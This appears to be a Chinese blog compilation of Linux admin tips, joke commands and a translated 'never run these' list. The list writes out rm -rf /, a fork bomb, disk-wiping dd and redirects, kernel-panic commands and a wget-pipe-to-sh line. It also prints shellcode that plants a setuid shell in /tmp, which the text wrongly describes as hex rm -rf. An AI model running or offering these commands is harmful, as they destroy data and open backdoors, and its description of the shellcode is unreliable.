Linux 高级命令
像一些高级点的命令,好比说 Xargs 命令、管道命令、自动应答命令等,若是当初我要是知道,那我也可能写出简洁高效的脚本。html
无论出于任何缘由,我都想对一些 Linux 使用的高级命令进行用法说明,利人利己,之后不记得的话,我也能够回头翻来看看。mysql
1、实用的 xargs 命令linux
在平时的使用中,我认为 xargs 这个命令仍是较为重要和方便的。咱们能够经过使用这个命令,将命令输出的结果做为参数传递给另外一个命令。sql
好比说咱们想找出某个路径下以 .conf 结尾的文件,并将这些文件进行分类,那么普通的作法就是先将以 .conf 结尾的文件先找出来,而后输出到一个文件中,接着 cat 这个文件,并使用 file 文件分类命令去对输出的文件进行分类。shell
这个普通的方法还的确是略显麻烦,那么这个时候 xargs 命令就派上用场了。数据库
例1:找出 / 目录下以 .conf 结尾的文件,并进行文件分类api
命令:安全
# find / -name *.conf -type f -print | xargs file
输出结果以下所示:服务器
xargs 后面不只仅能够加文件分类的命令,你还能够加其余的不少命令,好比说实在一点的tar命令,你可使用find命令配合tar命令,将指定路径的特殊文件使用find命令找出来,而后配合tar命令将找出的文件直接打包,命令以下:网络
# find / -name *.conf -type f -print | xargs tar cjf test.tar.gz
2、命令或脚本后台运行
有时候咱们进行一些操做的时候,不但愿咱们的操做在终端会话断了以后就跟着断了,特别是一些数据库导入导出操做,若是涉及到大数据量的操做,咱们不可能保证咱们的网络在咱们的操做期间不出问题,因此后台运行脚本或者命令对咱们来讲是一大保障。
好比说咱们想把数据库的导出操做后台运行,而且将命令的操做输出记录到文件,那么咱们能够这么作:
nohup mysqldump -uroot -pxxxxx —all-databases > ./alldatabases.sql &(xxxxx是密码)
固然若是你不想密码明文,你还能够这么作:
nohup mysqldump -uroot -pxxxxx —all-databases > ./alldatabases.sql (后面不加&符号
执行了上述命令后,会提示叫你输入密码,输入密码后,该命令还在前台运行,可是咱们的目的是后天运行该命令,这个时候你能够按下Ctrl+Z,而后在输入bg就能够达到第一个命令的效果,让该命令后台运行,同时也可让密码隐蔽输入。
命令后台执行的结果会在命令执行的当前目录下留下一个nohup.out文件,查看这个文件就知道命令有没有执行报错等信息。
3、找出当前系统内存使用量较高的进程
在不少运维的时候,咱们发现内存耗用较为严重,那么怎么样才能找出内存消耗的进程排序呢?
命令:
# ps -aux | sort -rnk 4 | head -20
输出的第4列就是内存的耗用百分比。最后一列就是相对应的进程。
4、找出当前系统CPU使用量较高的进程
在不少运维的时候,咱们发现CPU耗用较为严重,那么怎么样才能找出CPU消耗的进程排序呢?
命令:
# ps -aux | sort -rnk 3 | head -20
输出的第3列为CPU的耗用百分比,最后一列就是对应的进程。
我想你们应该也发现了,sort 命令后的三、4其实就是表明着第3列进行排序、第4列进行排序。
5、同时查看多个日志或数据文件
在平常工做中,咱们查看日志文件的方式多是使用tail命令在一个个的终端查看日志文件,一个终端就看一个日志文件。包括我在内也是,可是有时候也会以为这种方式略显麻烦,其实有个工具叫作multitail能够在同一个终端同时查看多个日志文件。
首先安装multitail:
# wget ftp://ftp.is.co.za/mirror/ftp.rpmforge.net/redhat/el6/en/x86_64/dag/RPMS/multitail-5.2.9-1.el6.rf.x86_64.rpm # yum -y localinstall multitail-5.2.9-1.el6.rf.x86_64.rpm
multitail工具支持文本的高亮显示,内容过滤以及更多你可能须要的功能。
以下就来一个有用的例子:
此时咱们既想查看secure的日志指定过滤关键字输出,又想查看实时的网络ping状况:
命令以下:
# multitail -e "Accepted" /var/log/secure -l "ping baidu.com"
是否是很方便?若是平时咱们想查看两个日志之间的关联性,能够观察日志输出是否有触发等。若是分开两个终端可能来回进行切换有点浪费时间,这个multitail工具查看何尝不是一个好方法。
6、持续ping并将结果记录到日志
不少时候,运维总会听到一个声音,是否是网络出什么问题了啊,致使业务出现怪异的症状,确定是服务器网络出问题了。这个就是俗称的背锅,业务出了问题,第一时间相关人员找不到缘由不少状况下就会把问题归结于服务器网络有问题。
这个时候你去ping几个包把结果丢出来,人家会反驳你,刚刚那段时间有问题而已,如今业务都恢复正常了,网络确定正常啊,这个时候估计你要气死。
你要是再拿出zabbix等网络监控的数据,这个时候就不太稳当了,zabbix的采集数据间隔你不可能设置成1秒钟1次吧?小编就遇到过这样的问题,结果我经过如下的命令进行了ping监控采集。
而后再有人让我背锅的时候,我把出问题时间段的ping数据库截取出来,你们公开谈,结果那次被我叼杠回去了,之后他们都不敢轻易甩锅了,这个感受好啊。
命令:
ping api.jpush.cn | awk ‘{ print $0” “ strftime(“%Y-%m-%d %H:%M:%S”,systime()) } ‘ >> /tmp/jiguang.log &
输出的结果会记录到/tmp/jiguang.log 中,每秒钟新增一条ping记录,以下:
7、查看tcp链接状态
指定查看80端口的tcp链接状态,有利于分析链接是否释放,或者攻击时进行状态分析。
命令:# netstat -nat |awk ‘{print $6}’|sort|uniq -c|sort -rn
8、查找80端口请求数最高的前20个IP
有时候业务的请求量忽然上去了,那么这个时候咱们能够查看下请求来源IP状况,若是是集中在少数IP上的,那么多是存在攻击行为,咱们使用防火墙就能够进行封禁。命令以下:
# netstat -anlp|grep 80|grep tcp|awk '{print $5}'|awk -F: '{print $1}'|sort|uniq -c|sort -nr|head -n20
# netstat -anlp|grep 80|grep tcp|awk '{print $5}'|awk -F: '{print $1}'|sort|uniq -c|sort -nr|head -n20
9、ssh实现端口转发
可能不少的朋友都据说过ssh是linux下的远程登陆安全协议,就是通俗的远程登陆管理服务器。可是应该不多朋友会据说过ssh还能够作端口转发。其实ssh用来作端口转发的功能仍是很强大的,下面就来作示范。
实例背景:咱们公司是有堡垒机的,任何操做均须要在堡垒机上进行,有写开发人员须要访问ELasticSearch的head面板查看集群状态,可是咱们并不想将ElasticSearch的9200端口映射出去,依然想经过堡垒机进行访问。因此才会将通往堡垒机(192.168.1.15)的请求转发到服务器ElasticSearch(192.168.1.19)的9200上。
例子:
将发往本机(192.168.1.15)的9200端口访问转发到192.168.1.19的9200端口
ssh -p 22 -C -f -N -g -L 9200:192.168.1.19:9200 ihavecar@192.168.1.19
ssh -p 22 -C -f -N -g -L 9200:192.168.1.19:9200 ihavecar@192.168.1.19
记住:前提是先进行秘钥传输。
命令执行完后,访问192.168.1.15:9200端口则真实是访问192.168.1.19:9200端口。
参考连接:https://mp.weixin.qq.com/s/eBDVEyvkheldnfh43KfYwg
21条命令合集
1.sl 命令
你会看到一辆火车从屏幕右边开往左边。。。。。。
安装 $ sudo apt-get install sl
运行 $ sl
命令有 -alFe几个选项,
-a An accident seems to happen. You'll feel pity for people who cry for help.
-l shows little one.
-F It flies.
-e Allow interrupt by Ctrl+C.
能够给别人来个恶做剧,他一敲ls,不知道的确定颇有效果
$alias ls=sl
2.fortune 命令
输出一句话,有笑话,名言什么的 (还有唐诗宋词sudo apt-get install fortune-zh)
安装 $sudo apt-get install fortune
运行 $fortune
3.cowsay 命令
用ASCII字符打印牛,羊等动物,还有个cowthink,这个是奶牛想,那个是奶牛说,哈哈,差很少
安装 $sudo apt-get install cowsay
运行 $cowsay "I am not a cow, hahaha"
$cowsay -l 查看其它动物的名字,而后-f跟上动物名,如
$cowsay -f tux "坑爹啊"
还可让cowsay说出fortune的内容,就像这样:
$fortune | cowsay
4.cmatrix 命令
这个很酷!《黑客帝国》那种矩阵风格的动画效果
安装 $ sudo apt-get install cmatrix
运行 $cmatrix
5.figlet 、toilet命令
艺术字生成器,由ASCII字符组成,把文本显示成标题栏。此外还有banner这个命令
安装 $sudo apt-get install figlet
$sudo apt-get install toilet
运行 $figlet fuck you !
$toilet i love you
toilet还能够添加颜色,里面的选项请本身man一下
$ toilet -f mono12 -F gay a girl
6.oneko 命令
桌面上出现一直喵星人,跟着你的鼠标跑,你不动了它就睡觉。哈哈,这个挺不错
安装 $sudo apt-get install oneko
运行 $oneko 要关掉这家伙,按ctrl+c 结束
7.xeyes 命令
在屏幕上出现一双眼睛,盯着你的鼠标指针
安装运行同上
8.yes 命令
输出无穷无尽的字符,按ctrl+c结束,如
$yes 我很NB
9.cal 9 1752
cal是打印日历,不过这个是很奇葩的一个月,
10.shred
覆盖搞乱文件,就是文档粉碎,哈哈,要把你私藏的大片种子和电影销毁,不被恢复出来,就靠它了
11.factor
分解因数,这个。。。小学生能够用一下
12.挨个敲下面这一堆, aptitude没有的能够安装上
aptitude moo
aptitude -v moo
aptitude -vv moo
aptitude -vvv moo
aptitude -vvvv moo
aptitude -vvvvv moo
aptitude -vvvvvv moo
aptitude -vvvvvvv moo
13.free the fish
桌面游过一条鱼...
alt+f2 输入free the fish
那么,继续!
14.rm -rf /
和大多数 Linux 命令同样,rm 这个核心命令使用起来很是方便。即使是最顽固的文件它也能帮你删除。结合起后面两个参数理解 rm 指令时,你很容易陷入大麻烦:-r,强制递归删除全部子目录,-f,无需确认,强制删除全部只读文件。若是你在根目录运行这条指令,将清除整个驱动器上的全部数据。
而后,当文件化为乌有时其中也包括了公司的视频。幸运的是,在疯狂敲击 control -C 后,在删除太多文件以前,系统管理员停止了这条命令。但这是对你的警告:任何人均可能犯这样的错误。
事实上,绝大部分现代操做系统都会在你犯这些错误以前,用一段醒目的文字警告你。然而,若是你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。(LCTT 译注:幸运的是,可能在根目录下删除整个文件系统的人太多了额,后来 rm 默认禁止删除根目录,除非——你手动加上 –no-preserve-root 参数!)
这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码:
char esp[] __attribute__ ((section(“.text”))) = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
这是什么?这是 16 进制的 rm -rf 写法。在你不明确这段代码以前,请千万不要运行这条命令!
15.fork 炸弹
既然咱们讨论的都是些奇怪的代码,不妨思考一下这一行:
:(){ :|: & };:
对你来讲,这可能看起来有些神秘,可是我看来,它就是那个臭名昭著的 Bash fork 炸弹。它会反复启动新的 Bash shell,直到你的系统资源消耗殆尽、系统崩溃。
不该该在最新的 Linux 系统上作这些操做。注意,我说的是不该该。我没有说不能。正确设置用户权限,Linux 系统可以阻止这些破坏性行为。一般用户仅限于分配使用机器可用内存。可是若是做为 root 用户的你运行了这行命令(或者它的变体 Bash fork 炸弹变体),你仍然能够反复虐待服务器,直到系统重启了。
16.垃圾数据重写硬盘
有时候你想完全清除硬盘的数据,你应该使用 Darik’s Boot and Nuke (DBAN) 工具去完成这项工做。
可是若是仅仅想让你的存储器乱套,那很简单:
任意命令 > /dev/hda
我说的“任意命令”,是指有输出的任意命令,好比:
ls -la > /dev/hda
……将目录列表经过管道送到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。这是让你开始盲目恐慌的一天的好办法,或者,能够把它变成职业禁入方式。
17.擦除硬盘!
另外一个一直受欢迎的擦除硬盘的方式是执行:
dd if=/dev/zero of=/dev/hda
你能够用这条命令写入数据到你的硬盘设备。dd 命令能够从特殊文件中获取无尽个 0 字符,而且将它所有写入你的设备。
18./dev/null 的损失
另外一个毁灭你的存储设备的方式,运行 mv / /dev/null 或者 >mv /dev/null。
在前一种状况下,你做为 root 用户,把整个磁盘数据都送进这个如饥似渴的 /dev/null。在后者,你仅仅把家目录喂给这个空空如也的仓库。任何一种状况下,除非还原备份,你不再会再看见你的数据了。
19.格式化错了驱动器
有时候你须要使用这一条命令格式化驱动器:
mkfs.ext3 /dev/hda
……它会用 ext3 文件系统格式化主硬盘驱动器。别,请等一下!你正在格式化你的主驱动器!难道你不须要用它?
当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的须要格式化的那块而不是你正在使用的那块,不管它们是 SSD、闪存盘仍是其余氧化铁磁盘。
20.内核崩溃
一些 Linux 命令不能让你的机器长时间停机。然而,一些命令却能够致使内核崩溃。这些错误一般是由硬件问题引发的,但你也能够本身搞崩。
当你遭遇内核崩溃,从新启动系统你才能够恢复工做。在一些状况下,这只是有点小烦;在另外一些状况下,这是一个大问题,好比说,高负荷运做下的生产环境。下面有一个案例:
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
这些都会致使内核崩溃。
毫不要运行你并不了解它功能的命令,它们都在提醒我…
21.提防未知脚本
年轻或是懒惰的系统管理员喜欢复制别人的脚本。何须从新重复造轮子?因此,他们找到了一个很酷的脚本,承诺会自动检查全部备份。他们就这样运行它:
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
这会下载该脚本,并将它送到 shell 上运行。
你认为你不会干那样的事?告诉我,全部那些 你在 Docker 里面运行的容器镜像在干什么?你知道它们到底在运行着什么吗?我见过太多的没有验证容器里面装着什么就运行它们的系统管理员。请不要和他们同样。
结束
我有没有遗漏什么?在 @sjvn 或 @enterprisenxt 上告诉我哪些 Linux 命令在你的“毫不要运行!”的清单上。
参考资料:
http://www.cnblogs.com/sukai/archive/2013/06/08/3127031.html
https://linux.cn/article-9206-1.html